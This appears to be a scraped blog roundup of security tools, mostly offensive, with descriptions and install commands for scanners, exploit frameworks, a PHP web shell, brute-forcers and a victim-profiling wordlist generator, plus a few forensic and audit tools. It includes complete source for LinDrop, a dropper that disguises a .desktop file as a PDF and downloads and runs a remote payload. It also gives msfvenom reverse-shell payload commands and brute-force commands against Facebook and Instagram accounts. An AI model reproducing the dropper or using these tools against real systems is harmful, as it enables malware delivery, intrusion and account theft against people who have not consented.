Changelog atscan v11.8:
* Add check for updates message.
* Add license.
* Fix uninstall process.
* Remove tool info to arguments.
* Fix E-mails scan.
* Set output to anywhere.

atscan v11.8

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before

Changelog create_ap v0.4:
+ All codescripting bug fixes.

create_ap v0.4

create_ap is a script for creates a NATed or Bridged WiFi Access Point.
Features
* Create an AP (Access Point) at any channel.
* Choose one of the following encryptions: WPA, WPA2, WPA/WPA2, Open (no encryption).
* Hide your SSID.
* Disable communication between clients (client isolation).
* IEEE 802.11n & 802.11ac support
* Internet sharing methods: NATed or Bridged or None (no Internet sharing).
* Choose the AP Gateway IP (only for ‘NATed’ and ‘None’ Internet sharing methods).
* You can create an AP with the same interface you are getting your Internet connection.
* You can pass your SSID and password through pipe or through arguments (see examples).

create_ap v0.3

Dependencies
General
+ bash (to run this script)
+ util-linux (for getopt)
+ procps or procps-ng
+ hostapd
+ iproute2
+ iw
+ iwconfig (you only need this if ‘iw’ can not recognize your adapter)
+ haveged (optional)

For ‘NATed’ or ‘None’ Internet sharing method
– dnsmasq
– iptables

Example Use & Download from git:

git clone https://github.com/oblique/create_ap && cd create_ap
make install

ArchLinux:
yaourt -S create_ap

Gentoo:
emerge layman
layman -f -a jorgicio
emerge net-wireless/create_ap


Examples
No passphrase (open network):
create_ap wlan0 eth0 MyAccessPoint

WPA + WPA2 passphrase:
create_ap wlan0 eth0 MyAccessPoint MyPassPhrase

AP without Internet sharing:
create_ap -n wlan0 MyAccessPoint MyPassPhrase

Bridged Internet sharing:
create_ap -m bridge wlan0 eth0 MyAccessPoint MyPassPhrase

Bridged Internet sharing (pre-configured bridge interface):
create_ap -m bridge wlan0 br0 MyAccessPoint MyPassPhrase

Internet sharing from the same WiFi interface:
create_ap wlan0 wlan0 MyAccessPoint MyPassPhrase

Choose a different WiFi adapter driver
create_ap --driver rtl871xdrv wlan0 eth0 MyAccessPoint MyPassPhrase

No passphrase (open network) using pipe:
echo -e "MyAccessPoint" | create_ap wlan0 eth0

WPA + WPA2 passphrase using pipe:
echo -e "MyAccessPoint\nMyPassPhrase" | create_ap wlan0 eth0

Enable IEEE 802.11n
create_ap --ieee80211n --ht_capab '[HT40+]' wlan0 eth0 MyAccessPoint MyPassPhrase

Client Isolation:
create_ap --isolate-clients wlan0 eth0 MyAccessPoint MyPassPhrase

Download: v0.4.zip  | v0.4.tar.gz
Source: https://github.com/oblique | Our Post Before

Changelog creak v0.0.3 – 2016-10-26:
* Added
ip link as ifconfig is deprecated on some distributions
* Changed
+ started porting to python 3
+ fixed some minor bugs
+ refactored a bit

creak v0.0.3

Deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language, i decline every responsibility for any abuse.

It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module.

example usage creak v0.0.2

Installation:

git clone https://github.com/codepr/creak.git && cd creak
pip install -r requirements.txt
python creak.py -h

Upgrade:
git pull origin master

Source: https://github.com/codepr | Our Post Before

Disclaimer:
All scripts/tools/software here are provided for educational purposes only. The author of any of the scripts/tools/software is in no way responsible for any misuse of the scripts/tools/software provided. In no way should you use the tools to cause any kind of damage directly or indirectly. Unauthorized use of any of the provided scripts/tools/software against a system that you do not own is illegal. Don’t be stupid.

lindrop is a desktop file payload dropper. This script generates a zip file which contains a .desktop file masquerading as a PDF. Downloads and opens a remote PDF file and downloads and executes a remote payload.
Useful in SE zip file situation where your targets are specifically linux users.
Quick payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

LinDrop

Requirement:
+ Metasploit
+ Linux Operating System

Usage:

sudo apt-get install zip
git clone https://github.com/x-42/LinDrop && cd Lindrop
python lindrop.py
or
copy paste the code here:

Code:

#!/usr/bin/env python
# .desktop file payload dropper. This script generates a zip file which contains a .desktop file masquerading as a PDF. 
# Downloads and opens a remote PDF file and downloads and executes a remote payload. 
# Useful in SE zip file situation where your targets are specifically linux users.
# Quick payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
# requires zip: apt-get install zip
import os

class color:
    g = '\033[92m'
    y = '\033[93m'
    b = '\033[0m'

print color.y + '''
 __ __           __
|  |__|.-----.--|  |.----.-----.-----.
|  |  ||     |  _  ||   _|  _  |  _  |
|__|__||__|__|_____||__| |_____|   __|
                               |__|
 by @0rbz_ (Fabrizio Siciliano)
'''

pdf_file_name = raw_input(color.y + "Output PDF file name ---> " + color.b)
output_zip_name = raw_input(color.y + "Output ZIP name ---> " + color.b)
remote_payload_url = raw_input(color.y + "Remote Payload URL ---> " + color.b)
remote_pdf = raw_input(color.y + "Remote PDF to Display to the user ---> " + color.b)


f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop", "a")
f.write("[Desktop Entry]" + "\n" + "Type=Application" + "\n" + "NoDisplay=False" + "\n" + "StartupNotify=true" + "\n" + "Icon=/usr/share/icons/gnome-colors-common/scalable/apps/x-pdf.svg" + "\n" + "Name[en_US]=" + pdf_file_name + ".pdf" + "\n" + "Terminal=false" + "\n")

f.write("\n"*1000 + """Exec=sh -c "wget 'remote_pdf' -O /tmp/temp.pdf && sh -c 'xpdf /tmp/temp.pdf &' && sh -c 'rm -rf /tmp/pl892' && sh -c 'wget remote_payload_url -O /tmp/pl892' && sh -c 'chmod +x /tmp/pl892' && sh -c '/tmp/pl892'""" + '"' + "\n")

f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'r')
fdata = f.read()
f.close()
new = fdata.replace("remote_payload_url", str(remote_payload_url))
f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'w')
f.write(new)

f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'r')
fdata = f.read()
f.close()
new = fdata.replace("remote_pdf", str(remote_pdf))
f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'w')
f.write(new)

f.close()

ex = os.system("chmod +x " + pdf_file_name +".pdf*")
tarr = os.system("tar -czf " + output_zip_name+".tar.gz " + pdf_file_name + ".pdf*")
zzip = os.system("zip " + output_zip_name +".zip " + pdf_file_name + ".pdf*" + " --quiet")
rem = os.system("rm " + pdf_file_name + ".pdf*")

print color.g + "Files " + '"' + output_zip_name + ".zip" + '"'+ " and" + ' "' + output_zip_name + ".tar.gz" + '"' " have been created and ready to send to the target." + color.b

Source: https://github.com/x-42

SysScout is a fully encapsulated script that quickly and easily pulls local machine information from Linux-Based systems. A simple, easy to use Incident Response and Network Forensics tool. Unlike other scripts that require installation of dependencies and toolkits, SysScout is ready to deploy on most Linux Distros.

SysScout

Mac Forensicators NOTE: This script works for the most part in MacOS, but not completely (there are some wonky exceptions). You will also need to use a directory besides /opt as this doesn’t exist in HFS+.

Download, setup & usage:

Run these commands in a Linux-Based Terminal
git clone https://github.com/joshbrunty/SysScout /opt/SysScout/
cd /opt/SysScout/
./SysScout.sh

Source: https://github.com/joshbrunty

Changelog Jexboss v1.1.2:
* Added support for reverse shell (meterpreter, etc).
* Improvements in exploits to support complex commands with pipe and etc (|,>, <, etc …)
* Fixes and improvements.

jexboss v1.1.2

jexboss v1.0.15

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.
Requirements
+ Python >= 2.7.x
+ urllib3

Features:
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
* /admin-console [ NEW ]
+-+ tested and working in JBoss versions 5 and 6
* /jmx-console
+-+ tested and working in JBoss versions 4, 5 and 6
* /web-console/Invoker
+-+ tested and working in JBoss versions 4
* /invoker/JMXInvokerServlet
+-+ tested and working in JBoss versions 4 and 5

Usage:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h

Upgrade with git:
git pull origin master

Source: https://github.com/joaomatosf | Our Post Before

Changelog sqlmap v1.0.11:
+ Fix several typos
+ Extra: Preventing obnoxious ‘install git’ on MacOS.
+ xml: Revisiting banner xmls (Issue #2239).
+ bug fixes sql error? (Android Qpython) #2245
+ txt: Unhandled exception bug fixes #2257

sqlmap v1.0.11

sqlmap v1.0.10

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SqlmaThis Tools has been tested on Kali-Sana, Arch Linux, Ubuntu, Debian platform & Mac OSX.

Installation :

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -hh (for basic full Option)

Update:
python sqlmap.py --update

Source : http://sqlmap.org | Our Post Before | Download: 1.0.11.zip | 1.0.11.tar.gz

Changelog Yasuo v2.3:
1) Accepts file with new-line separated list of IP addresses with “-l” switch.
2) Smart brute-forcing. Introduced app-specific credentials in the signature file, which are tried first.
3) Sqlite database integration. Yasuo output is now stored in a sqlite database.
4) All output and log files are now saved in “logs” directory.
5) And man there were bugs. Fixed now.

yasuo v2.3

yasuo 2.1

Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.

While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on.

If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc.
Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter.

Setup / Install

gem install ruby-nmap net-http-persistent mechanize sqlite3 text-table
git clone https://github.com/0xsauby/yasuo
cd yasuo
./yasuo.rb
update
git pull origin master

Details

Yasuo provides following command-line options:

-r :: If you want Yasuo to perform port scan, use this switch to provide an IP address or IP range or an input file with new-line separated IP addresses

-f :: If you do not want Yasuo to perform port scan and already have an nmap output in xml format, use this switch to feed the nmap output

-n :: Tells Yasuo to not ping the host while performing the port scan. Standard nmap option.

-p :: Use this switch to provide port number(s)/range

-A :: Use this switch to scan all the 65535 ports. Standard nmap option.

-b [all/form/basic] :: If the discovered application implements authentication, use this switch to brute-force the auth. "all" will brute-force both form & http basic auth. "form" will only brute-force form-based auth. "basic" will only brute-force http basic auth.

-h :: Well, take a guess

Examples
./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
The above command will perform port scan against 127.0.0.1 on ports 80, 8080, 443 and 8443 and will brute-force login for all the applications that implement form-based authentication.

./yasuo -f my_nmap_output.xml -b all
The above command will parse the nmap output file “my_nmap_output.xml” and will brute-force login for all the applications that implement form-based and http basic authentication.

Download : Master.zip  | Clone Url
Source : https://github.com/0xsauby | Our Post Before

The PyCodeInjection project contains two main components:
1. PyCodeInjectionShell – A tool to exploit web application based Python Code Injection
2. PyCodeInjhectionApp – A web application that is intentially vulnerable to Python Code Injection

PyCodeInjection

Dependencies:
+ Python 2.7.x
+ pip
+ web.py
Platform : ALL Operating system support

Usage:

windows:
python -m pip install web.py
git clone https://github.com/sethsec/PyCodeInjection && cd PyCodeInjection

Linux/Unix :
git clone https://github.com/sethsec/PyCodeInjection.git /opt/PythonCodeInjection
cd /opt/PythonCodeInjection/VulnApp
./install_requirements.txt

Source: https://github.com/sethsec

Changelog Invoke-Obfuscation v1.5 – 2016-11-04:
* BlueHat: Added WMIC LAUNCHER with some randomization of WMIC command line arguments.

Purpose:
Attackers and commodity malware have started using extremely basic obfuscation techniques to hide the majority of the command from the command line arguments of powershell.exe. I developed this tool to aid the Blue Team in simulating obfuscated commands based on what I currently know to be syntactically possible in PowerShell 2.0-5.0 so that they can test their detection capabilities of these techniques.

Invoke-Obfuscation v1.5

The tool’s sole purpose is to break any assumptions that we as defenders may have concerning how PowerShell commands can appear on the command line. My hope is that it will encourage the Blue Team to shift to looking for Indicators of Obfuscation on the command line in addition to updating PowerShell logging to include Module, ScriptBlock and Transcription logging as these sources simplify most aspects of the obfuscation techniques generated by this tool.

Usage:

git clone https://github.com/danielbohannon/Invoke-Obfuscation && cd Invoke-Obfuscation
OPen Powershell
cd [Your Path]
Import-Module ./Invoke-Obfuscation.psm1
Invoke-Obfuscation

Upgrade:
git pull origin master

Source: https://github.com/danielbohannon

Latest Change v410.4:
+ Latest News: Updated Recovery Menu, Minor Bugfixes.
+ Fixed/Added/Implemented Cloudflare resolver.
+ dnspython in setup.py addressed.

v3n0m-scanner v410.4

V3n0M is a free and open source scanner. Evolved from baltazar’s scanner, it has adapted several new features that improve fuctionality and usability. It is mostly experimental software.

Features: 
* SQli-Dorker XSS&LFI>RCE DNS-Bruteforcer.
* Cloudflare-Resolver FTP-Crawler AdminPage-Finder.

This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.
Very useful for executing:
* Metasploit Modules Scans
* LFI, RFI and XSS Scanning[LFI/RFI/XSS]
* SQL Injection Vuln Scanner[SQLi]
* Extremely Large D0rk Target Lists
* FTP Crawler
* DNS BruteForcer
* Python3.5 Asyncio based scanning

What You Hold:
The official adoption of darkd0rker heavily recoded, updated, expanded and improved upon
* Brand new, just outta the box!
* Largest and most powerful d0rker online, 18k+d0rks searched over ~ Engines at once.
* Free and Open /src/
* CrossPlatform Python based toolkit
* Version 4.0.6 Released on 14th August 2016
* Licensed under GPLv2
* Tested on: ArchLinux 4.4.6-1, Ubuntu, Debian, Windows, MacOS

Installation & Usage from git:

git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner && cd V3n0M-Scanner
sudo pip3 install dnspython3 aiohttp httplib2 socksipy-branch requests url
python3 setup.py
cd src
python3 v3n0m.py

Update:
cd V3n0M-Scanner
git pull origin master

Download: V.4.0.6.zip  | V.4.0.6.tar.gz
Source: https://github.com/v3n0m-Scanner | Our Post Before

PoSH-R2 is a set of Windows Management Instrumentation interface (WMI) scripts that investigators and forensic analysts can use to retrieve information from a compromised (or potentially compromised) Windows system. The scripts use WMI to pull this information from the operating system. Therefore, this script will need to be executed with a user that has the necessary privileges.

PoSh-R2

PoSH-R2 will retrieve the following data from an individual machine or a group of systems:
– Autorun entries
– Disk info
– Environment variables
– Event logs (50 lastest)
– Installed Software
– Logon sessions
– List of drivers
– List of mapped network drives
– List of running processes
– Logged in user
– Local groups
– Local user accounts
– Network configuration
– Network connections
– Patches
– Scheduled tasks with AT command
– Shares
– Services
– System Information

Usage:

git clone https://github.com/WiredPulse/PoSh-R2 && cd PoSh-R2
cd PoSh-R2
./PoSH_R2.ps1

Source: https://github.com/WiredPulse

BenchIT is a simple Python script for security auditing purposes. It is the most useful for auditing systems by analyzing files collected from remote hosts. It allows you to check certain system settings stored in configuration files by using regular expressions. The simplest check will determine if a pattern matches. However, with capturing groups it is also possible to determine whether the actual value matches the expected or the default value. Results are summarized in a HTML report and also stored in a CSV file.

BenchIT

Regular expressions must be stored in a CSV file containing the following columns separated by a semicolon (;):
* Boolean value which determines whether we expect a match or not (“True”).
* Name of the file (“sshd_config”).
* Regular expression to evaluate (“^Protocol[ \t]+(\d)$”).
* Number of the chaper in the given CIS guideline (“9.2.1”).
* Title of the chapter in the given CIS guideline (“Set SSH Protocol to 2”).
* Short summary of the chapter (“SSH supports two different protocols…”).
* Default value of the setting (“2,1”).
* Expected value of the setting (“2”).

system requirements:
– GnuWin32 with ports of the necessary tools
++ http://getgnuwin32.sourceforge.net/
– Q to execute SQL-like queries on CSV files
++ http://harelba.github.io/q/
– The following Python libraries:
++ dominate, configobj

Use and download from git:

git clone https://github.com/sgabe/benchit && cd benchit
python benchit.py -h

Source: https://github.com/sgabe/benchit

brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are:
+ ssh
+ ftp
+ smtp
+ XMPP
+ instagram
+ facebook

brut3k1t

KEY NOTES TO REMEMBER:
* If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um… web-based.
* If you do not supply the delay -d flag, the default delay in seconds will be 1.
* Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
* Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
* Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
* Remember that some protocols are not based on their default port. A FTP server will not necessarily always be on port 21. Please keep that in mind.
* Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!

Use & download:

git clone https://github.com/ex0dus-0x/brut3k1t && cd brut3k1t
pip install -r requirements.txt
./brut3k1t.py
Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

Source: https://github.com/ex0dus-0x

Scout2 is a security tool that lets AWS administrators assess their environment’s security posture. Using the AWS API, Scout2 gathers configuration data for manual inspection and highlights high-risk areas automatically. Rather than pouring through dozens of pages on the web, Scout2 supplies a clear view of the attack surface automatically.

Note: Scout2 is stable and actively maintained, but a number of features and internals may change. As such, please bear with us as we find time to work on, and improve, the tool. Feel free to report a bug with details, request a new feature, or send a pull request

Scout2 v2.0.0rc7

Changelog Scout2 v2.0.0rc7:
* use opinel v1.0.2 which fixes reading role credentials on EC2 instance.
* A few new rules, tweak older rules, and more filters-related code.
* Make sure non zero is returned upon failure of opinel import.
* bug fixes

Requirements:
+ Python version: 2.7, 3.3, 3.4, 3.5
+ AWS Credentials
To run Scout2, you will need valid AWS credentials (Access Key). The role, or user account, associated with this Access Key requires read-only access for all resources in a number of services, including but not limited to CloudTrail, EC2, IAM, RDS, Redshift, and S3.
+ Compliant with AWS’ Acceptable Use Policy
Use of Scout2 does not require AWS users to complete and submit the AWS Vulnerability / Penetration Testing Request Form. Scout2 only performs AWS API calls to fetch configuration data and identify security gaps, which is not considered security scanning as it does not impact AWS’ network and applications.
+ All Operating System Support.

Use and Download:

git clone https://github.com/nccgroup/Scout2 && cd Scout2
pip install -r requirements.txt
python setup.py install
python Scout2.py --help

For Update:
python Scout2.py --update

Download Latest Stable version: v2.0.0rc7.zip  | v2.0.0rc7.tar.gz
Source: https://github.com/nccgroup

wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.
Prerequisites
* Python termcolor package. To install run: pip install termcolor
* Metasploit Framework.

wepwnise

wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the –msg parameter. To disable this functionality set the –msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRPs/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.

Usage & Download:

git clone https://github.com/mwrlabs/wePWNise && cd wePWNise
pip install termcolor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Source: https://labs.mwrinfosecurity.com/tools/wepwnise/

Changelog smod v1.0.4 11/11/2016:
* Update writeAllCoils.py
* Create writeAllRegister.py
* Update System/Core/Global.py

smod v1.0.4

smod v1.0.3

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

smod v1.0.2

Summary
SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ modbus is still widely used in power systems.
+ modbus/TCP is simple and easy to implement.
+ modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to vulnerability assessment a modbus protocol.

Installation & usage:

git clone https://github.com/enddo/smod && cd smod
python smod.py

Update:
cd smod
git pull origin master

Source : https://github.com/enddo | Our Post Before | Download old stable version: v1.0.3.tar.gz | v1.0.3.zip

Changelog AutOSINT v0.1
+ Update leak.txt
+ Update potfile.txt
+ Update Requirements, AutOSINT.py & Dependencies.

AutOSINT is a automate some common things checked during open source intelligence gathering engagements.

AutOSINT v0.1

Features:
* poll various OSINT sources for data, write to .doc
* whois – added
* dns – added
* shodan – added
* scrape pastebin, etc
* google dorks via googlesearch
* BGP info
* AS info
* linkedin (from Nick)
* Pyfoca; Google to discover files with extensions such as .pdf, .xls, .doc, etc.
* Email, Domain and People Harvester.

Dependencies:
+ Pyfoca will use Google to discover files with extensions such as .pdf, .xls, .doc, etc. and download them. https://github.com/altjx/ipwn
+ E-mail, subdomain and people names harvester. https://github.com/laramies/theHarvester

Usage and Download from source:

git clone https://github.com/bharshbarger/AutOSINT && cd AutOSINT
pip install -r requirements.txt
Besure All Dependencies has been install on your path.

python AutOSINT.py -h

Upgrade:
git pull [Note: Best run on Kali 2.0  to 2016.3 rolling]

Source: https://github.com/bharshbarger | Old Post Here

Note: This software was intended to be used for Demonstration and Learning Purposes only. The author is not responsible for any damage it may cause and user holds full responsibility of his/her actions.

Introduction
Attack Shell a.k.a. Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc. This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.

Attack Shell a.k.a. Ani-Shell

Features
* Shell
* Intelligent File Manager
* Auto Rooter
* PHP Obfuscate
* Platform Independent
* Mass – Mailer
* Small Web-Server Fuzzer
* Dosser
* Design
* Secure Login
* Deletion of Files
* Bind Shell
* Back Connect
* Fixed Some Coding errors!
* Rename Files
* Encoded Title
* Traceback (Email Alerts)
* PHP Evaluate
* Better Command Execution (supports older version of PHP)
* Mass Code Injector (Appender and Overwinter)
* Lock Mode Customization
* Mail Bomber (With Less Spam detection feature)
* PHP Decoder
* Anti-Crawler Feature
* MD5 Hash Cracker
* Python Bind-Shell

Customization
1. Email Traceback is set to off as default and emails will not be sent. If you are setting this feature on, make sure you change the default email address (franzwagner.str@gmail.com) to your email address. Please change it before using!
2. Username and Password are set to admin and 12345687 respectively, please change them for better security.
3. The Lock Mode feature is set to on ! This should not be change unless you want your shell exposed.
4. The Anti-Crawler feature is set to off ! Change it to on for anti-crawler support.
5. A variable named greetings can be changed to change the Shell’s greeting message.
Usage and Download from source:

git clone https://github.com/Strund3r/Attack-Shell
copy on Lamp(Linux) / xampp(Windows)

Run in a local Docker Container
Run on terminal:
$ docker run -d --name attack-shell strund3r/attack-shell

If you want to use a php.ini, change the Dockerfile to:

FROM php:7.0-apache

MAINTAINER Franzwagner Ternus <franzwagner.str@gmail.com>

COPY config/php.ini /usr/local/etc/php/
COPY . /var/www/html

Where config/ is the directory containing your php.ini file.

Default Login
Username: admin
Password: 12345687

Source: https://github.com/Strund3r

Disclaimer: Please do not use in military or secret service organizations, or for illegal purposes. The tool here is only used for educational purposes only. I will not be held responsible for any illegal activities conducted with this.
Pwdlogy – A victims’-profile-based wordlist generating tool for social engineers and security researchers!

pwdlogy

How to Use
1. Find out the victim’s name, username, hobbies, sports team, favourite food, and everything you can find out about him that might appear in his/her password
2. Find out as much as possible about his pets, family, friends (e.g. their name, birthday, and any keyword that might appear in his/her password
3. Place all the keywords (not the birthdays) into the keywords.txt file, with each keyword separated by a next line.
4. Place all the birthdays into the birthday.txt file, with each password being in the format (DDMMYYYY) and separated by a next line.
5. If you are fairly new to this tool, enter start and navigate to the gen.txt file (or whatever file if you have changed the settings) to see the generated wordlist. Go to 8
6. If you wish to use custom settings, use the custom command and follow the instructions displayed. Edit the custom formats file and when you are done, run the command start to begin generating the wordlist.
7. Check the gen.txt file to see the generated wordlist.
8. The wordlist generated will contain possible passwords of your victim. Use the wordlist with any password cracker. Good luck! ##Commands

Usage and download from source:

git clone https://github.com/tch1001/pwdlogy && cd pwdlogy
python pwdlogy.py
"help"

Source: https://github.com/tch1001